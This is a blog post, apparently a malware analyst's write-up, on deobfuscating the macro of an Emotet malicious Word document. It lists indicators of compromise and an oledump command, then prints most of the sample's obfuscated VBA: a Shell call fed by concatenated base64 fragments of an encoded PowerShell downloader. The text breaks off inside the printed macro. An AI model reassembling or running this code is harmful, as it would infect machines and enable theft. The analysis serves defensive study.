This blog entry is going to cover how I managed to de-obfuscate the macro from the Emotet sample that I was able to grab. The maldoc can be found in my GitHub repo located here: http://github.com/bloomer1016/2019-02-12-Deobfuscating-Emotet-Maldoc.
Indicators of Compromise:
==========================
MD5 of Word doc: 35c716c82f9912cb1a57bf7ee72e0c53
VT: http://www.virustotal.com/#/file/9fb5e5242394557e27ca3ccfc492f7db0f7474662148a8797953df702b4d78db/detection
Any.Run: http://app.any.run/tasks/0e428667-3602-489f-85ac-1f022e2c9c1f
Analysis:
=========
So to be honest, I was using this maldoc as a case to try to get better at using oledump from Didier Stevens. This all stems from his latest posts on the SANS ISC blog (http://isc.sans.edu/forums/diary/Maldoc+Analysis+of+the+Weekend/24626/ and http://isc.sans.edu/forums/diary/Video+Maldoc+Analysis+of+the+Weekend/24628/). Unfortunately, I was not able to get this maldoc de-obfuscated as easily as I hoped with his tool. The closest that I got with oledump was the following cleaned-up obfuscated code:
CMD: ./oledump.py -v -s A10 /Downloads/Email_zip_file\ \(1\)/attach/secure.accounts.docs.com ----- Attribute VB_Name = "sKfw6m" Function DsiufjK(rPP1jAE, wToiPvr) On Error Resume Next J5UUuW = 123061037 + Rnd(113821029 / ChrB(781545532)) * (KOOBJ15 * CStr(nCU1DV) + (721212395 * 935778426 - dw9RbQ * J3aLT4S * (nBmZw7Zd + ZQYnLzp))) Set L7zuIbtj = mahsn85 V9NaRBp = 95561692 + Rnd(957947317 / ChrB(117312524)) * (J6n6Ni * CStr(a7EBBTk) + (63234899 * 42872721 - ovAu45 * Dr73V6D * (i1ShnPJd + V9blDk))) Set bLLuAm = piEtG96 kobw56 = 545927644 + Rnd(581946775 / ChrB(607181138)) * (wRoKibm * CStr(sqHIXs) + (282809907 * 875422380 - trm3QUi3 * bCq8sa4 * (YKQibW + QYLnppq))) Set RYXzEjY7 = zKa8wzwa Shell (rPP1jAE + iJf1R0 + jG4Ranf + rppKckZK + oM1fQI + nRaN1qpw), l6dXY99 + qnul14Cw + wToiPvr + tzKhPcU + tm0T1td + zEB7op fdESF6 = 575508045 + Rnd(683532192 / ChrB(303497533)) * (jLUuzP * CStr(lIzzDBMQ) + (663769490 * 515866827 - KSjEhYc * TENapKzS * (m3KmGvq + uo5K85))) Set iQMazZ = DmWY1X oERpw3 = 383717547 + Rnd(399915385 / ChrB(399256710)) * (vYRhKH4D * CStr(B9GMwTU4) + (603348749 * 303774170 - TjNsOt2S * zBCsvH9l * (QhuGLcAj + p50LBuT))) Set ILNXV9EK = K6AMEYz zqCBZXJ = 548079610 + Rnd(771197523 / ChrB(751962899)) * (Du5G9N6 * CStr(BSd5a4w) + (480523241 * 29726740 - o1MoXz * qzQ3DrzY * (fwQ176Yi + ZXEtUllN))) Set lL0EPw = VNmiUua End Function Function UOiYERH() On Error Resume Next H57SuvkQ = 580923321 + Rnd(794405036 / ChrB(922132672)) * (iHzCJs * CStr(zkV9Dr) + (519194540 * 72757858 - cICcc6 * a4LjrPRR * (K9mTHvMT + kEEMhk))) Set GLp2RS = rW4GqwY KlUqpAq = 17708137 + Rnd(707881123 / ChrB(51263178)) * (rkjuGi * CStr(iCHtLi) + (148797801 * 336525818 - KSsCzQFh * rA7lri * (SLD73usJ + ZG1VV11))) Set pzQpibN = FjBrRP0 OsiXQFj = 338100754 + Rnd(445330114 / ChrB(702107231)) * (MuhpkGrG * CStr(bw2KXm) + (80762172 * 499341496 - GRZjvF * ajdzrC * (PLupjYWF + bFs7P7Ci))) Set S84fWnku = EwQXT4u0 QX0ipWjQ = "wersh" + "ell -" + "e J" + "ABIAE" + "wAMwA" W4muYS = 611167433 + 
Rnd(614748696 / ChrB(781594660)) * (fuPfln * CStr(U9AvEskE) + (858642824 * 260979276 - sKmAZGO * DOJJvP * (RZSJpVV + cBzNuV))) Set RbIPGfZ = Qt1lSdB z3w9zn = 993073110 + Rnd(741779901 / ChrB(334354848)) * (MFXjaSK * CStr(V9rjsAwK) + (507201983 * 373487450 - j6hCWJ * jFlicO * (ukifDb4 + OQw2wO))) Set ZlJ1dEIU = QXIEdF qYGMCi2F = "zAFIA" + "QwBS" + "ADA" + "APQAoA" + "CcAS" TzUjia = 565698346 + Rnd(225118524 / ChrB(638188131)) * (cK5zSF3q * CStr(S1p6uJCo) + (653494707 * 327994882 - G3Gw7P * jrWE1NS * (TEHwLC9 + mQjj0A0))) Set BsdJmv = hikFh2 CzSFDc = 632134329 + Rnd(86595323 / ChrB(830203560)) * (BoAkuO * CStr(KqZVRq) + (609165067 * 436608025 - qzwQMo9 * Ds9O9z * (f7ivcUh + hbBYbBR))) Set ZivcVm = zVOcbh ZzzVfP = "wB2" + "ACcAKw" + "AnA" + "GQATAA" + "nACsAJ" + "wB1AHA" + "AcgAnA" + "CkAOwA" + "kAEo" TXKcPvDT = 236589529 + Rnd(877971834 / ChrB(388169523)) * (HBiw30jH * CStr(Jh1rBfNz) + (444691419 * 228218004 - Vt2tHnq * uE9Q2ijN * (dwp05YEB + C7Ejol))) Set H33aXtRd = IAnmCRo Cbnwmb = 446275897 + Rnd(161868866 / ChrB(164012177)) * (PUEsWO1U * CStr(cuTsqawk) + (616637866 * 634967740 - qMjIhdQ * ZVuL4D * (jBbQLir + wAojhi))) Set a2INrWDt = UihzXE r98HzMT = 581348660 + Rnd(53715188 / ChrB(897420664)) * (pKU2LKi * CStr(ss2kNT) + (274942974 * 701914311 - lcFmn9Z * rpVWYKj7 * (i16IL9QG + tC3HXrK))) Set k3vnwMn = YaqXc8R zVCl3I58 = "ARwBU" + "ADk" + "AaQBZ" + "AE8A" + "YgA9AG" + "4AZQ" + "B3AC" + "0AbwB" krRqwkL = 115930249 + Rnd(367062198 / ChrB(963166020)) * (wfZ4XkYu * CStr(W0bjcfVR) + (255655955 * 972165962 - iRQzY7D * cujvkVj * (F3VrQRP + jvFrFn))) Set GnhMcrXU = su2Jvl FLio6M = 559670781 + Rnd(548770074 / ChrB(838715768)) * (nak9lG * CStr(RA2fnU) + (447465294 * 450247896 - dLB40O * XtuhFih * (IVdl1i + LPp2Tdud))) Set mE2bV1 = bbw5X89 fcsnuE = "iAGo" + "AZQBjA" + "HQAIAB" + "OAGUA" + "dAAu" + "AFcA" + "ZQB" + "iAEM" m14DVL = 572995062 + Rnd(682774435 / ChrB(713694484)) * (CnNPstY * CStr(lidlnh4I) + (32789883 * 481696362 - LPpdlNFj * WIBfdvn * (bucYLWRZ + WoO32w))) Set 
oHfTsPQ = iHEHfOk maFmfhG = 382677825 + Rnd(402723107 / ChrB(567869187)) * (hiIL3p * CStr(NpI7Q2u) + (246140479 * 273502882 - T5fznjK * RiDVzIz * (XqibVSES + hw2GiJ2))) Set nfmrcr = fwHIETcw cNsVZwis = "AbA" + "BpAGU" + "AbgB0A" + "DsA" + "JABQAG" + "YAdwBI" + "AGMAW" wQEJF5C = 910857363 + Rnd(735772532 / ChrB(646045182)) * (EKvQVU6 * CStr(JwMTOfsV) + (302030066 * 761120045 - Q7stFCpH * zEVElaMR * (Ztzb3z1Z + W3zwwOD))) Set PPvXfz = I4RJBwZV MMwCzQk = 635618321 + Rnd(211664598 / ChrB(172405967)) * (cHhmFk * CStr(JzqwIkPU) + (835699373 * 889928129 - mvQaXAB * YVWJFp * (ULcwHd + w4OBQzT))) Set Rw1HOF = bsdTpC58 spHYft = 787943675 + Rnd(503285352 / ChrB(823021615)) * (GGSl8Djp * CStr(B43bwAH6) + (434043747 * 881188666 - wOGjjlQK * i9RvNSj * (D3UwvO8 + jjYKOUID))) Set Y6Zk7kO = CwwZfO SomS25ZG = "ABaAF" + "MAPQ" + "AoACc" + "AaAAn" + "ACs" + "AJwB0A" + "HQAJw" + "ArACcA" ndWlmv = 950216595 + Rnd(508699961 / ChrB(660160967)) * (Q2Fw5w4 * CStr(YCZiDDBa) + (166636103 * 591485776 - MF5EAuBr * LR1CllA8 * (zZwrE3hi + RE2zEwK))) Set B3NdjzHn = VaNB5sz PZBhBY = 432847934 + Rnd(740372105 / ChrB(341720823)) * (bErf4p * CStr(bqF0hm) + (687029270 * 950393171 - ktTliuB * NnGj6f * (zzZwcr + RMad6V))) Set MnXz7k8 = dRoaHKd GNc88i = "cAA6A" + "C8AJwA" + "rACcAL" + "wBk" + "ACcAKw" + "AnA" UOiYERH = QX0ipWjQ + qYGMCi2F + ZzzVfP + zVCl3I58 + fcsnuE + cNsVZwis + SomS25ZG + GNc88i End Function Function B8waSCi() On Error Resume Next XwR36w = 740956857 + Rnd(869941583 / ChrB(530943620)) * (tSr33Iti * CStr(IXD5ru) + (825502236 * 225898445 - pD1Vsi * PdKbEz * (cwiQM4f + WO9OB5))) Set JJzcVKY = KwHsSPZ MnccV7 = 961190641 + Rnd(579445124 / ChrB(898137460)) * (Tmn4GCm * CStr(dPqURfh) + (903131872 * 722011649 - a4HzPP5 * YjjuY917 * (V5tnn08 + rZD2Sv))) Set awo2HUu = j67Tpk mm44hw = "GEA" + "JwA" + "rAC" + "cAZA" + "BhACcA" + "KwA" InO4O3Nf = 199648397 + Rnd(456529921 / ChrB(252932517)) * (S90uLjr0 * CStr(YT9qV8) + (203543474 * 467348574 - rCHVfI * zEmhoS * (ztRZFzp + iQL3i00n))) Set Q2nOCq = 
Wr7pq9 zcdKINwA = 305479612 + Rnd(453469133 / ChrB(364375221)) * (rcR0ckR * CStr(kpP3jv) + (140260638 * 45658419 - ti19I9zw * sjorwO * (cHlYw3u + NrA3Qzj0))) Set YJAowB4O = cESKof Or9bom = 801021977 + Rnd(593364666 / ChrB(394078277)) * (uu9tbvb * CStr(lWwHzjQu) + (182045760 * 66368653 - qu16Wil9 * LVjHmpjp * (izZ532n + CZU8sE0))) Set EQ1Vj5Jd = ulNjnBKB o8NUEiH = "nAG" + "YAYQBy" + "AGkAb" + "gBnAG8" + "AcwA" + "nACsAJ" WVGzsPp = 794294215 + Rnd(739163166 / ChrB(69831388)) * (uwT00uz * CStr(Lk18UDwV) + (742897564 * 330744520 - YFs2vkBA * V1MHPzp * (oQjNuP3 + uc0tkz))) Set fIOKvUWz = nMz0pP KzY2MmM = 871634362 + Rnd(506657181 / ChrB(584139411)) * (iYBN4f * CStr(p4wT1YS) + (718321847 * 645022795 - m7YRzA * j2LwYpP * (PXoLZXl + EAwTiO))) Set fOLHNN2 = ZlEYnl H0UFlvcY = 368496449 + Rnd(755538298 / ChrB(4852398)) * (SppvEM * CStr(A5bEt7C) + (48005019 * 485850505 - IHnvpZrs * Il9f92 * (zTSiNHE3 + qZV3BTQG))) Set AWXdXU2T = mFUMiaY jzYz573 = "wB0A" + "GEAcgA" + "nACs" + "AJwAuA" + "CcAKw" + "AnAG" + "MAJwAr" + "ACcAb" Ss7dvFBj = 658707985 + Rnd(741460773 / ChrB(863073318)) * (f0H93w * CStr(tzAuJLs) + (103099660 * 527807294 - UjYoVM * nwzw75 * (p3VjD9 + v7tl5TZ))) Set lfpMUw = ljzC0Ezl u0sop6jn = 669096961 + Rnd(367437000 / ChrB(234394384)) * (jBjHPvh * CStr(EVDM8Rw) + (997570283 * 857621762 - kruGpMB * KIVzji5w * (VU8X4Xk + PwpfzJt0))) Set XCujCT8 = hYX0KZ J6EaO6 = "wBtAC8" + "AJw" + "ArA" + "CcAcgB" + "0AF" + "EAdwBU" cfWDMuO = 561080402 + Rnd(307034837 / ChrB(452682044)) * (lRkuXEFd * CStr(Of7DVN5) + (121958036 * 686562204 - rusNANjM * NrkZTf * (iYUjEO2 + VBoLvw))) Set b3jW2fRs = pWoBr5 VSNjYf = 938352640 + Rnd(281385414 / ChrB(305682240)) * (p34Ruh1 * CStr(MUvAh7tT) + (680785701 * 180003934 - GOUWj2O * F1UNhOLI * (AJUzFhN + nmlHOMp))) Set wNpl49I = o0siL5z Xqms33DF = 860284994 + Rnd(816974520 / ChrB(432755606)) * (BUSGn3 * CStr(jF1vo4k) + (283074538 * 474804983 - t0ZjrX * nfwzUlsF * (ssR5Uul + L0czXdT2))) Set nktm8wJ = bK7wwn woo96Zz6 = "ACcAK" + "wAnADU" + "AJw" + 
"ArACcA" + "NQB6" + "AEAA" jhoci1Oj = 249824459 + Rnd(385038570 / ChrB(802697655)) * (isaVuW * CStr(wjRU7A6K) + (138134194 * 991762995 - O35wi7 * qiNqQO * (ST6Ph5r9 + f1TVGY))) Set zswl1zw5 = SlErsJw RqSbml7G = 493294547 + Rnd(941951185 / ChrB(107727560)) * (Ej9pZi * CStr(DtTb87) + (470117345 * 906077628 - DJlhdMA * f8CEo1H * (VRknGtP + AoodLHSC))) Set cGvo97v = iok110 XcutWDO4 = 590959662 + Rnd(964447523 / ChrB(72472530)) * (uiA0JR * CStr(zYmrDH) + (414704443 * 283378948 - b3zjv2p * RpDO00 * (QCN0Az + CHCT6wl))) Set cvPTwI = DcY7Knrq zpfFBH = "JwAr" + "ACcA" + "aAB0AH" + "QAcA" + "AnACs" + "AJwA6" + "AC8ALw" + "AnACsA" qPSOSzr = 273662946 + Rnd(301592405 / ChrB(403393355)) * (kciM5LYD * CStr(P1E8JAS0) + (476476745 * 936633883 - NIX2dJn * o8oVG23t * (iXJ8cKU + wT6lTHMV))) Set kOaOuf = fDIaPFj lV7a7Wih = 29791594 + Rnd(330322809 / ChrB(49106137)) * (RKVHZp6Q * CStr(jUa7Lf) + (410399670 * 571741316 - UbhYIwIs * KBDWSMN * (JJa6TQ + VSCmvli))) Set j79mjMpL = OEn0RGj bOIDQsaj = "JwBm" + "AGkAJ" + "wArAC" + "cAbABl" + "ACc" + "AKw" njDMcZ = 65144999 + Rnd(867128970 / ChrB(155940769)) * (EWFUh5t * CStr(mEOimR) + (672095181 * 533618897 - OrKJ9jLM * BtkjPpK * (VMFtFWq + iKtjAdY))) Set KGuWrLXF = kS8HfCb EpfAUYB = 151644257 + Rnd(98819593 / ChrB(942538894)) * (cOPXaFlZ * CStr(CSY3wLKC) + (910136498 * 254367424 - mwKEdWjI * RTmMDBh * (jXPmMl + r0DCSKk))) Set LWmO17i = EQkHJisO J8cCvsJ = "AnAC4" + "AbABhA" + "HUAYQ" + "BzAGk" + "Abg" + "BoAC4" + "AYwB" + "vAG0" B8waSCi = mm44hw + o8NUEiH + jzYz573 + J6EaO6 + woo96Zz6 + zpfFBH + bOIDQsaj + J8cCvsJ End Function Function BIBrlzL() On Error Resume Next salW3cd = 897688160 + Rnd(173242530 / ChrB(572437022)) * (Gzmr88 * CStr(s5L1Fu) + (505833081 * 87354455 - k22CKl * zK8kYkk * (Vi736d0p + nRI8Yo))) Set zJFmAjVA = OflPaw SVSj7IL = 498493456 + Rnd(257208968 / ChrB(175405816)) * (sOQj7ssG * CStr(i86MMLzA) + (133236746 * 143755478 - WobX5lw * EXHKbEB * (fmKovU + wArPCcaW))) Set EizGRqS = pBuGvp1 LvY3XP = "AJw" + "ArA" + "CcA" + "LwAn" + 
"ACs" + "AJw" sdbVwkcl = 994524332 + Rnd(220288436 / ChrB(179756893)) * (IfrPWDOt * CStr(YipZKP9S) + (717361710 * 557880855 - bvJuusS * k3RvKJXm * (AAi9wGK + B6c26w9))) Set fSfbLN = Uo0Fkpw9 ankR7E = 139855470 + Rnd(657506679 / ChrB(209285051)) * (GTcMEiE * CStr(DR6qaozi) + (403650313 * 120336883 - ws9WibA * sU48jtPl * (iM5PNs51 + hPF6AJ))) Set rjHESDN = l46i4l Dcvnnls = "BQAC" + "cAK" + "wAnAF" + "gAZQBo" + "AEwA" + "JwA" + "rACcA" + "UAAnAC" DQRBBiZ = 129612578 + Rnd(158530774 / ChrB(979388377)) * (cmZZj5m * CStr(TO4qOPa1) + (996308587 * 268788261 - JAfOvvk5 * XGC7UDP * (vlhqBYUz + OKs3sXm4))) Set GCaYBwwo = TkNfSEoU Mud3Tm = 254708547 + Rnd(546893607 / ChrB(656376276)) * (VuujdIqE * CStr(CVvKYK) + (679619170 * 309913694 - LmKFnp3K * Z4o4zcv * (OMa1BMZ + wbjOi7mw))) Set wzPfmPsI = T6Z043hw rfHzP8Z5 = 779452360 + Rnd(314524005 / ChrB(434963530)) * (QBz6aLW * CStr(mO98tV) + (75953258 * 777698624 - rk7MsQBp * zpKVk0N * (VzwAjv31 + EzAvkK))) Set qEpZfjR = DnXtHl Bkabza = "sAJwBQ" + "AGw" + "AQA" + "AnACsA" + "JwBo" + "AHQAdA" zziwRDBb = 705064820 + Rnd(15520999 / ChrB(155267771)) * (LfJvfTt * CStr(LCjivZa) + (655770653 * 621557200 - sH9Ek4 * LYsCkwh * (aPsiiikc + OlADY70d))) Set ELl3QD0 = wsOKsJXf iSwATJ7D = 117721301 + Rnd(410169800 / ChrB(903695667)) * (iHJ6jJ * CStr(Gwo54j) + (14831678 * 668017117 - JFRvLWjw * WkA7M3NM * (u8XkhiJF + wX1bsWB))) Set pZu1ishz = BVzZbEOs AtDAi4 = 79192877 + Rnd(356646810 / ChrB(193150959)) * (aoA2az * CStr(LOb0jNM) + (577273781 * 10214071 - RwhbP27 * fkaCrop * (FlFIbj0 + bzRTE0sZ))) Set KvAiiVzn = P2hzC5v wbqHZhV = "AnA" + "CsA" + "JwBw" + "ACcA" + "KwAnA" + "DoAJwA" + "rAC" + "cALwAv" + "AGEA" SN9EOt = 400801773 + Rnd(706481524 / ChrB(212746292)) * (pJzzDbE * CStr(BVihzT6f) + (537372501 * 220808891 - FivJH6WF * fmLmiPa * (i3F0Bp + vz4K0r))) Set iBq7fsTh = wVLvqEDA kpApXD = 162495480 + Rnd(792398794 / ChrB(649698527)) * (ZjMwL1wW * CStr(avAOshlF) + (509792796 * 554562066 - uFzVoWK * Rzr8ih * (fSoYIL + WofirI))) Set CqGBzLc = iK6TRK0A 
QrPd0du = 571751711 + Rnd(596249814 / ChrB(290889878)) * (Nm3GRu7 * CStr(srhXaJ) + (720783157 * 982961732 - jilpU4 * pbrP9z * (ZHA8GhwP + lFiTBk))) Set cEp8iMGk = dlsrvl nDv43V = "JwArA" + "CcAbgA" + "nACsAJ" + "wBn" + "AGkAcg" + "BhAH" Z6swz6 = 439748052 + Rnd(831622495 / ChrB(404758131)) * (iT1dj2 * CStr(OsV0Oabj) + (823614072 * 607952038 - WQu1kdF * rXimkRB * (HACk4iI + SXWmNtF))) Set iA4Fw5c = pWoIZ2T n18jT6 = 952144196 + Rnd(230294134 / ChrB(425223701)) * (E63TCnf * CStr(wHztkj) + (400904022 * 632467969 - r5jZ1T * tbVUAIDU * (w1PIRBKm + zwjT5J))) Set cfBAB1m = hHopPJro Qss2NEcF = 361089100 + Rnd(965824406 / ChrB(716103464)) * (lj2OjV9 * CStr(POAaPUz) + (982453181 * 801390467 - JtiF4C9E * NiRcvtJ * (PMM8Zd + qIRXKNHd))) Set oUjW4J = jt9iko rWLso0 = "MALgAn" + "ACsA" + "JwBv" + "AHIAJ" + "wArAC" + "cAZw" + "AvAH" mtz3DZX = 962115688 + Rnd(186144534 / ChrB(171845330)) * (AVs08A * CStr(SolOHZ5) + (162493122 * 948977706 - wSzPGBW4 * WOADo9 * (Ii8ISBE + noiNApK))) Set KFl8kGmS = iLda4zw caBTAmqM = 871765078 + Rnd(707258343 / ChrB(507267468)) * (BIp99Gz * CStr(ojjioYnr) + (928811235 * 513266027 - TMfp2vfS * QAU746 * (LMEunc + wSjKw0w))) Set wKTGVRT = MjOrirqr jiC3ZwNt = "gAJwAr" + "ACcAOA" + "BCAC" + "cAK" + "wAnAG" + "oAYQB" + "NAC" + "cAKwA" wM1jwl1h = 80999420 + Rnd(445577673 / ChrB(144647992)) * (WwFwvU * CStr(j2jZNZ) + (404611844 * 802660200 - LsmdTW7P * toRX6I * (N3SzuzRU + fLbt7d))) Set Z9cs2f = KCjJiE SAuc9T1G = 521046457 + Rnd(991904743 / ChrB(334991763)) * (UkjtcWo * CStr(EwKCdiA) + (338337561 * 636398123 - ZuYfKj * UfLN9mE * (iVwNz1 + P71SGLWw))) Set hMDi3m = A4jMZYw NknRZU1L = 947509473 + Rnd(456253818 / ChrB(316982394)) * (sQ5fdSQA * CStr(QziCoroP) + (280977523 * 226482944 - wTrLE9 * JiofpJ8z * (rw42Ub + JdRMCs))) Set RlwSOSRm = J9Wfuzh8 NpY8wL9 = "nADQ" + "AJw" + "ArA" + "CcAN" + "AAnA" + "CsAJwA" wl7PnKt = 339086241 + Rnd(587795483 / ChrB(159454497)) * (mYKEPfo0 * CStr(zU8Tljd) + (914514087 * 730759206 - QwMOQ3X * vmLtvn7 * (bG6CaomR + K2pa5Ra))) Set 
s0mQm4nT = c9km8M GM27B0 = 935041082 + Rnd(773137296 / ChrB(937261156)) * (u86X8k * CStr(YCFSEMc5) + (102353533 * 556183881 - Nv6tXkGS * riO5GR8C * (zPaFC4z + DzNXqvI))) Set AWdnMr = DKFL8E9 Shl9iw = "0AEkA" + "QABoAH" + "QAdAA" + "nACs" + "AJw" + "BwACc" + "AKwAnA" b8tqLvh = 740872502 + Rnd(958053801 / ChrB(844614177)) * (wYNlRjnA * CStr(w0hCqNHG) + (278944652 * 239573739 - tJIFBLE4 * IVMK0jm * (bzzBtJI + f2jI8J))) Set XMhb7s = rLzfOld Ujzz0k = 496985461 + Rnd(963076803 / ChrB(572193659)) * (NzXiwwP * CStr(IAwXoj) + (937109883 * 110568400 - lzdUG7v * RiSFzhL * (M99kQf + mZKZoXz))) Set swcRlCaw = s601d1s ivOPAV = 947449998 + Rnd(912092045 / ChrB(427464764)) * (pfbuo5j * CStr(dPYOPU8) + (577691146 * 752099965 - lXm0KRW * U5kS64r * (hbWv1f + z0pYWJu))) Set V4cjWiA5 = iFTWmkT zhGozS = "DoA" + "LwA" + "vAGEA" + "ZABzAH" + "UAaQB" + "kAGU" BIBrlzL = LvY3XP + Dcvnnls + Bkabza + wbqHZhV + nDv43V + rWLso0 + jiC3ZwNt + NpY8wL9 + Shl9iw + zhGozS End Function Function wBuzmLiw() On Error Resume Next vNrK59 = 956706527 + Rnd(818839896 / ChrB(796694744)) * (NHaPKlrO * CStr(NcdZw8Mj) + (337452864 * 740566261 - cskorLpR * C8fChbIh * (ZVovNvI + Pcwfijro))) Set ajPlhZj4 = nYzD3RM lDoFh0l = 472973831 + Rnd(808105059 / ChrB(834895767)) * (winr3f * CStr(JmAJACGd) + (874977290 * 543129242 - jWY6wzKs * OBIW9RhL * (XGRFCiE + GlQrNhmG))) Set CVTLiV0A = q7rUkb PnSizzU = 213939234 + Rnd(774407036 / ChrB(371253078)) * (LI11W9 * CStr(boSXYXZk) + (766663396 * 408958789 - nsdUNPA * YrQMQb70 * (HqS2oV + XZtbWU))) Set ZpfmH9 = D8CLH6cl qc2z0SEi = "ALgBjA" + "GwAJwA" + "rACcAd" + "QBiA" + "C8AeQ" + "AnACs" + "AJwA3A" + "CcA" lbU0oKiJ = 988155962 + Rnd(209797982 / ChrB(816298229)) * (SLM5jYVq * CStr(AV1tQoa) + (744496409 * 566978797 - tp1aiXp * ozZlwlkB * (cGHGTow + ZjcPYU))) Set SiCAqcz = wO6oEY IIfvfQ = 126723074 + Rnd(435246359 / ChrB(239927486)) * (Iwb2OvdJ * CStr(pmHtUpiO) + (274313895 * 667423204 - wT9PHuL * Dj4lNf * (fPAbJWjY + fnM8nA))) Set G30ot8Gz = LHHKRj ZGimFT = 448910842 + 
Rnd(975006233 / ChrB(902959419)) * (DquEND3h * CStr(qRtwwj) + (694330149 * 839966900 - UQmifl * itIzz8 * (QDciJik + qvzTtuII))) Set pDMjlAz = uBbvvW Oujhvq7b = "KwAnA" + "DcAUQB" + "UAEsA" + "aABW" + "AEAAa" JNkiz3t = 972918120 + Rnd(62913320 / ChrB(675933919)) * (TLltLFr * CStr(vq5uWh1) + (117545973 * 552808295 - uJlddw * KHUJTIK * (wXkuX1Qh + WU42fp1f))) Set GQWRRib = fmMMHLK LhWNjJ = 422361797 + Rnd(825988100 / ChrB(960446742)) * (unQbwl5 * CStr(RBHvYS5) + (371852211 * 669689825 - SbnCHit * VBGmPuw * (Mfj3rq + fzQPDJs))) Set XANTP2 = JT6ffnd QV7zAXF = "AAnAC" + "sAJwB0" + "AHQ" + "AcAAn" + "ACsAJw" + "A6AC8" ccEjDY = 754402666 + Rnd(918619055 / ChrB(332129654)) * (oOdci46m * CStr(iGQzdXZn) + (365204995 * 167486757 - T9LUVwT * iZZ3O2R * (JoKf8V + iBUR82LZ))) Set OKhJTRZ = s7OjIwG0 IoDhaM = 680309150 + Rnd(409541587 / ChrB(272583767)) * (w77M0s * CStr(KIOUAj) + (230196283 * 737336328 - NojRw9VK * Qcrz7p * (onJOQb + vUD9Mc))) Set BDpnH92 = J1tabXUz BzjlMR1F = "ALwBt" + "AGkAY" + "wBoA" + "GEAZQ" + "BsAHc" + "Acg" YEZYKz = 484079901 + Rnd(856252385 / ChrB(453031564)) * (ni7woC * CStr(JKCbiHz) + (524843583 * 525322135 - Q8appC1 * fAi2So * (QLbYIcd1 + vRXR8Jz))) Set R3RuzH = JlKI1m d1qKOZ4 = 569587438 + Rnd(40491157 / ChrB(795065016)) * (XuzjUS * CStr(DZd4Q6L) + (484350220 * 264894368 - EOzuWb * XPiDk4 * (CJoPjWcj + p4SNZS8))) Set Fo0dE3BC = S3AzFJU OQKf7zP = "BpAG4" + "AZwBs" + "ACcAK" + "wAnAGU" + "AJwArA" + "CcAcgA" + "uAG" + "MAbwAn" iPajiivw = 758049099 + Rnd(29968186 / ChrB(84134420)) * (zpJCJLqM * CStr(lPirktdA) + (454640686 * 979235537 - Ysphul * Gw2Kmaf * (kLvlUrR0 + CRBnzS))) Set WXlbEj = vYXFJN6J JJBzKd0 = 533760493 + Rnd(204798771 / ChrB(972421293)) * (NRAdWzj4 * CStr(kjTTa5sC) + (597516013 * 796959116 - EZXt08 * WTW13z * (DhjJtWb + rDFwKXL))) Set KkGm1lzt = IdblLF9 aUmOd6IY = 813499503 + Rnd(892580030 / ChrB(229282420)) * (RSLoKM * CStr(S4zDjIX) + (92456921 * 676503421 - VVCFZLfI * DUdaRK * (ZlrvMJaz + ouTITP4r))) Set ncoDSN = SnS9SVL ds84PI = "ACs" + 
"AJw" + "BtAC8A" + "SQBSA" + "FkAWQ" EnFmNMk = 158944847 + Rnd(495498364 / ChrB(317397199)) * (Odn3lV05 * CStr(Ho8sazts) + (643924693 * 122337613 - nsBzvw * iPdW9V61 * (Nw0Ria + ozZwp7B))) Set v2vjLAoO = itE24Z s53wzV4 = 433634640 + Rnd(637973148 / ChrB(324097061)) * (QL2bUcc * CStr(Qr7U65E) + (601877437 * 277611535 - wQEmdcQh * C8fzwrY0 * (ppDhM7 + WzzWsRhD))) Set w3L5Mi = WjGMplSZ bZjAXG = "AnAC" + "sAJwBx" + "AFAAY" + "gA1AC" + "cAKwAn" + "AE4AJw" + "ApA" + "C4AUwB" zJaNqwG = 899556606 + Rnd(323850921 / ChrB(502299257)) * (ZBRanD * CStr(HPwVsmL) + (866253917 * 206154605 - kCATQD * CVNSNDan * (TuAQTSt + aDnOqP))) Set GirAX8IF = zlSR9ojz w8C6ATj = 241659996 + Rnd(221131664 / ChrB(67853889)) * (i9Spcmnn * CStr(GYHS4bwL) + (941622527 * 173833504 - cPNYlMB7 * Zzl8sa * (PItCzo + VHcBHKGr))) Set WDAal7 = uTr7tW lsk59K2 = "wAGwA" + "aQB" + "0ACgAJ" + "wBA" + "ACcA" + "KQA7AC" + "QAa" + "QAw" KLPzsmr = 338153119 + Rnd(235357777 / ChrB(298636519)) * (bEp1Ja * CStr(S9RcLCBV) + (489922374 * 216470377 - Ti45Ca * kkpPUapz * (MHuHRN5z + fV1Bzc59))) Set qs9vBvSC = TNXf9YRP tXsOkA = 610084019 + Rnd(501257081 / ChrB(868022676)) * (JzOPLhAY * CStr(laT7L1dP) + (771486829 * 751382428 - rGbF8Pf * qX59YshP * (lwHJ7YS + HPFMIz))) Set pFku4j = CZ9zH6A5 MzvEWt = "ADUANQ" + "BhAG" + "wATw" + "BQAD" + "0AK" dLH2l3 = 483458888 + Rnd(225844508 / ChrB(860698071)) * (H2cI5E7 * CStr(hMXBjRrT) + (286274657 * 198493336 - VPoPcU * lCcOsj * (FO4wLtWW + RULK7p))) Set llz3cu = GltJTA j29Ibk = 628709120 + Rnd(937903414 / ChrB(301295133)) * (NSZmmzz * CStr(I3f6tn0) + (970414523 * 752346545 - hCjjXr * mzS0sTiz * (r4kY03 + CZwkoLT))) Set LvzP6WDP = uzmOzzo6 CSfGq3 = "AAn" + "AHQAcA" + "BZA" + "EUAM" + "gBvACc" + "AKw" s30bZv = 323743509 + Rnd(971962241 / ChrB(573005648)) * (zdtWJ6K * CStr(DVh498) + (840601367 * 509444007 - B7W2DV * q3UoFSil * (Qhza9A + RFdb6wv))) Set ZmmqAUOW = UPPYX2jL MR7BGw = 599233617 + Rnd(898967321 / ChrB(769829978)) * (ZrrcTkiE * CStr(EkHTrLXt) + (661800549 * 658446957 - Gj1Dk6M * 
